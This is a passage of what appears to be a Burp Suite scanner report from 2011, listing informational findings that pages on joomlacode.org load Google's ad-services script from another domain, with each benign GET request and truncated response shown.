Path:	/gf/&hl=en&client=ca-pub-1189370408998555&adU=Nexternal.com/Joomla-Shopping-Cart&adT=Joomla+Compatible+Cart&adU=www.lynda.com&adT=Joomla+Tutorials&gl=US/x26amp

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/&hl=en&client=ca-pub-1189370408998555&adU=Nexternal.com/Joomla-Shopping-Cart&adT=Joomla+Compatible+Cart&adU=www.lynda.com&adT=Joomla+Tutorials&gl=US/x26amp HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:15:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.Tenrox.com/Free_Demo&adT=Online+Project+Management&adU=www.eSpatial.com/Free-Trial&adT=Geographic+Information&gl=US/x26amp

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/&hl=en&client=ca-pub-1189370408998555&adU=www.Tenrox.com/Free_Demo&adT=Online+Project+Management&adU=www.eSpatial.com/Free-Trial&adT=Geographic+Information&gl=US/x26amp HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:17:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.243. http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.safepeak.com&adT=ImageAd&gl=US/x26amp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.safepeak.com&adT=ImageAd&gl=US/x26amp

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/&hl=en&client=ca-pub-1189370408998555&adU=www.safepeak.com&adT=ImageAd&gl=US/x26amp HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:18:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.244. http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.sysaid.com&adT=ImageAd&gl=US/x26amp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.sysaid.com&adT=ImageAd&gl=US/x26amp

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/&hl=en&client=ca-pub-1189370408998555&adU=www.sysaid.com&adT=ImageAd&gl=US/x26amp HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:16:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.245. http://joomlacode.org/gf/account/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/account/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/account/?action=LostPassword HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.246. http://joomlacode.org/gf/project/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:38:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.247. http://joomlacode.org/gf/project/articlecomments/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/articlecomments/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/articlecomments/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:50:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.248. http://joomlacode.org/gf/project/autobb/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/autobb/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/autobb/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:49:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.249. http://joomlacode.org/gf/project/bm01/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/bm01/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/bm01/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:45:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.250. http://joomlacode.org/gf/project/booking/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/booking/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/booking/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:46:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.251. http://joomlacode.org/gf/project/com_joodater/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/com_joodater/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/com_joodater/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:31:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.252. http://joomlacode.org/gf/project/com_joodater/news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/com_joodater/news/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/com_joodater/news/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:29:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18809

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.253. http://joomlacode.org/gf/project/demosite/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/demosite/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/demosite/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:48:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32835

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.254. http://joomlacode.org/gf/project/docman/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/docman/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/docman/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:54:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.255. http://joomlacode.org/gf/project/feedgator/frs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/feedgator/frs/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/feedgator/frs/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:34:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.256. http://joomlacode.org/gf/project/feedgator/news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/feedgator/news/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/feedgator/news/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:33:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.257. http://joomlacode.org/gf/project/imgttfmenu/news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/imgttfmenu/news/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/imgttfmenu/news/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:27:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.258. http://joomlacode.org/gf/project/jevents/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/jevents/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/jevents/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:52:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17280

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.259. http://joomlacode.org/gf/project/joomfish/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/joomfish/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/joomfish/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:54:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.260. http://joomlacode.org/gf/project/joomla/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/joomla/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/joomla/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:37:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.261. http://joomlacode.org/gf/project/joomla/frs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/joomla/frs/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/joomla/frs/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:37:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ">

<head>
<meta
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.262. http://joomlacode.org/gf/project/joomla/mailman/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlacode.org
Path:	/gf/project/joomla/mailman/

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /gf/project/joomla/mailman/ HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:23:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
